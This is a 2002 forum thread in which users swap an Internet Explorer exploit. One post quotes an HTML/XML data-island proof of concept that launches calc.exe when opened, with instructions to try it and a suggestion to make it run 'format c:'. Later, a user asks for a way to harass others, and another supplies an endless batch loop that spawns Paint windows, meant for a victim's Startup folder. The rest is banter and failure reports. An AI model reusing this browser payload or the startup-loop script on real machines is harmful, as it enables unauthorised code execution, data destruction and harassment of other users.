Author Topic: Fun little IE exploit.  (Read 1159 times)

CommonSense

  • VIP
  • Member
  • ***
  • Posts: 21
  • Kudos: 0
    • http://www.microsuck.com
Fun little IE exploit.
« on: 6 March 2002, 07:02 »
Check this one out.

http://www.liquidwd.freeserve.co.uk/

It opens a new command prompt window.  I don't know if this is old news or what, and I was too lazy to go upstairs to the one token Windows box to see it work (I'm an OS X user, after all).  Looks like there's great potential for trouble with a little creative tweaking of the source of this page . . .

voidmain

  • VIP
  • Member
  • ***
  • Posts: 5,605
  • Kudos: 184
    • http://voidmain.is-a-geek.net/
Fun little IE exploit.
« Reply #1 on: 6 March 2002, 07:44 »
Yes, I was aware of that one for a month or two now, and apparently it's been a problem for a very long time, but just recently made public.  Yep, wouldn't take much to wipe out a hard drive just by browsing to the wrong site...
Someone please remove this account. Thanks...

Bateluer

  • Member
  • **
  • Posts: 66
  • Kudos: 0
Fun little IE exploit.
« Reply #2 on: 6 March 2002, 08:27 »
Lucky I don't use IE unless I am forced to  

edit - It does not open the cmd.exe in Opera 6.01  :D

[ March 05, 2002: Message edited by: Bateleur ]


voidmain

  • VIP
  • Member
  • ***
  • Posts: 5,605
  • Kudos: 184
    • http://voidmain.is-a-geek.net/
Fun little IE exploit.
« Reply #3 on: 6 March 2002, 08:48 »
Holy Shit!  I clicked that link on my RedHat box and it fired up a copy of VMware running Windows 2000, then opened up a command prompt.  After it did that it opened up kdevelop and finished that KDE application for me that I've been working on.
Someone please remove this account. Thanks...

Bateluer

  • Member
  • **
  • Posts: 66
  • Kudos: 0
Fun little IE exploit.
« Reply #4 on: 6 March 2002, 21:28 »
lol!

jtpenrod

  • VIP
  • Member
  • ***
  • Posts: 675
  • Kudos: 105
Fun little IE exploit.
« Reply #5 on: 6 March 2002, 10:38 »
Or how about this one fromThe Register

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
            ]]>
        </exploit>
    </security>
</xml>

Just copy that into any text editor, save as a *.html file and open it with IE. According to the article, this will launch the calculator program. Macro$uck doesn't have a patch for this (so what else did you expect?   :eek:  ) There is a way to get around this, but the cure sounds almost as bad as the disease. I don't suppose it would be too much trouble to get that to do, let's say, format c:  ;)  ?

Yet another Stupid Windows Trick from the Trustworthy Computing Co.  :D    :D    :D    :D
Live Free or Die: Linux
If software can be free, why can't dolphins?

Druid

  • Member
  • **
  • Posts: 28
  • Kudos: 0
Fun little IE exploit.
« Reply #6 on: 7 March 2002, 00:38 »
Doesn't work for me.
Win2k, IE6

The path "c:/windows/ system32/calc.exe" is valid, btw

Druid

voidmain

  • VIP
  • Member
  • ***
  • Posts: 5,605
  • Kudos: 184
    • http://voidmain.is-a-geek.net/
Fun little IE exploit.
« Reply #7 on: 7 March 2002, 21:27 »
Druid, do you think you can get your money back?  Sounds like your copy of Windows isn't working properly.  

[ March 07, 2002: Message edited by: VoidMain ]

Someone please remove this account. Thanks...

tallwookie2

  • Newbie
  • *
  • Posts: 1
  • Kudos: 0
Fun little IE exploit.
« Reply #8 on: 7 March 2002, 10:18 »
hmm... running win 98 se... that "command line" easter egg or whatever didnt do a damned thing... luv the site btw!

-tallwookie2

phill

  • Newbie
  • *
  • Posts: 3
  • Kudos: 0
Fun little IE exploit.
« Reply #9 on: 9 March 2002, 15:31 »
Win2K, IE6, don't do anything here  :confused:    :D
All that glitters has a high refractive index.

dirtydog

  • Newbie
  • *
  • Posts: 2
  • Kudos: 0
Fun little IE exploit.
« Reply #10 on: 9 March 2002, 20:19 »
Not a thing here ! Win 98 SE    :D
DirtyDog

Bateluer

  • Member
  • **
  • Posts: 66
  • Kudos: 0
Fun little IE exploit.
« Reply #11 on: 10 March 2002, 10:53 »
How would you write a script to open say 5000 instances of Paint? I want to piss off some MS-Man whores  

voidmain

  • VIP
  • Member
  • ***
  • Posts: 5,605
  • Kudos: 184
    • http://voidmain.is-a-geek.net/
Fun little IE exploit.
« Reply #12 on: 10 March 2002, 12:03 »
Create a batch file called m$paint.bat and add it to his Startup folder with the following:

@echo off
:hell
echo Microsoft $ucks!!
start pbrush
goto hell

[ March 10, 2002: Message edited by: VoidMain ]

Someone please remove this account. Thanks...

Bateluer

  • Member
  • **
  • Posts: 66
  • Kudos: 0
Fun little IE exploit.
« Reply #13 on: 10 March 2002, 20:19 »
I don't have physical access to their machines  

Druid

  • Member
  • **
  • Posts: 28
  • Kudos: 0
Fun little IE exploit.
« Reply #14 on: 11 March 2002, 00:58 »
Quote
Originally posted by VoidMain:
[QB]Druid, do you think you can get your money back?  Sounds like your copy of Windows isn't working properly.      

Of course it isn't working properly, that's how it was designed

Druid